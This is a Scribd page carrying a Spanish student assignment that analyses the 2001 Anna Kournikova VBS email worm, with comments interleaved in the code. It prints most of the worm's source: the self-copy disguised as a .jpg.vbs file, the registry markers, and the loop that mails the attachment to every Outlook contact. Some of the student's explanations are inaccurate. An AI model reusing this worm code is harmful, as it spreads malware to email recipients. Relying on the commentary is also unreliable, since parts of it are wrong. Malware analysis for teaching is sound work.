Scribd Logo
Carica

Benvenuto in Scribd!

  • 1 Kournikova

    Caricato da

    Paul Cabrera
    30 visualizzazioni3 pagine

    Titolo originale

    1%20Kournikova

    Copyright

    © © All Rights Reserved

    Formati disponibili

    PDF, TXT o leggi online da Scribd

    Hai trovato utile questo documento?

    Questo contenuto è inappropriato?

    Segnala questo documento

    Copyright:

    © All Rights Reserved
    Scarica in formato PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    30 visualizzazioni3 pagine

    1 Kournikova

    Caricato da

    Paul Cabrera

    Copyright:

    © All Rights Reserved
    Scarica in formato PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    di 3

    Asignatura Datos del alumno Fecha

    Análisis de un malware real

    Anna Kournikova, antiguo, del 2001, muy antiguo, pero efectivo…

    ¿Cómo comprueba el gusano si ya ha realizado el mailing masivo?


    ¿Cuál es el asunto de los correos que se envían?
    ¿Qué ocurre el 26 de enero de cada año?

    'Vbs.OnTheFly Created By OnTheFly

    On Error Resume Next

    Set WScriptShell= CreateObject("WScript.Shell")

    WScriptShell.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b"

    Set FileSystemObject=Createobject("scripting.filesystemobject") FileSystemObject.copyfile


    wscript.scriptfullname,FileSystemObject.GetSpecialFolder(0) &

    "\AnnaKournikova.jpg.vbs"
    Nos crea un script en el que crea un objeto que hace una llamada al Sistema llamado y lo
    esconde en la imagen de Anna Kournikova, el objeto pesa 1 giga y medio

    if WScriptShell.regread ("HKCU\software\OnTheFly\mailed") <> "1" then infect()


    end if

    Si el script se crea en el ordenador entonces este está infectado

    if month(now)=1 and day(now)=26 then

    WScriptShell.run "http://www.dynabyte.nl",3,false end if


    Si estamos a día 26 el script te manda directamente a esa página

    Set thisScript=FileSystemObject.opentextfile(wscript.scriptfullname, 1)
    thisScriptText=thisScript.readall thisScript.Close

    Se ejecuta el script y luego se cierra


    Asignatura Datos del alumno Fecha

    Do

    If Not (FileSystemObject.fileexists(wscript.scriptfullname)) Then

    Set newFile=FileSystemObject.createtextfile(wscript.scriptfullname, True)


    newFile.write thisScriptText newFile.Close
    End If

    Loop

    Si el archivo no existe lo crea lo escribe y por ultimo lo cierra

    Function doMail()

    On Error Resume Next

    Set OutlookApp=CreateObject("Outlook.Application")

    Crea el objeto aplicacion outlook

    If OutlookApp="Outlook" Then

    Set MAPINameSpace=OutlookApp.GetNameSpace("MAPI")

    Set AddressLists=MAPINameSpace.AddressLists

    Establece todas las direcciones de correo electrónico de la lista

    For Each address In AddressLists

    If address.AddressEntries.Count <> 0 Then


    entryCount=address.AddressEntries.Count

    For i=1 To entryCount

    Set newItem=OutlookApp.CreateItem(0) Set


    currentAddress=address.AddressEntries(i)
    newItem.To=currentAddress.Address
    newItem.Subject="Here you have, ;o)"
    newItem.Body="Hi:" & vbcrlf & "Check This!" & vbcrlf &
    ""
    set attachments=newItem.Attachments attachments.Add
    FileSystemObject.GetSpecialFolder(0) &

    "\AnnaKournikova.jpg.vbs" newItem.DeleteAfterSubmit=True
    Asignatura Datos del alumno Fecha

    If newItem.To <> "" Then newItem.Send


    WScriptShell.regwrite
    "HKCU\software\OnTheFly\mailed", "1"

    Empieza a crear un objeto ese objeto lo inserta en la dirección de correo y a su vez ese
    objeto lo esconde detrás de la imagen de Anna Kournikova, crea un mail con un texto que
    saluda y dice que mires esto, una vez clickado se ejecuta el script, con el for se ejecutaria una
    y otra vez hasta que ha enviado todos los mails

    End If

    Next

    End If

    Next
    end if
    End Function

    Potrebbero piacerti anche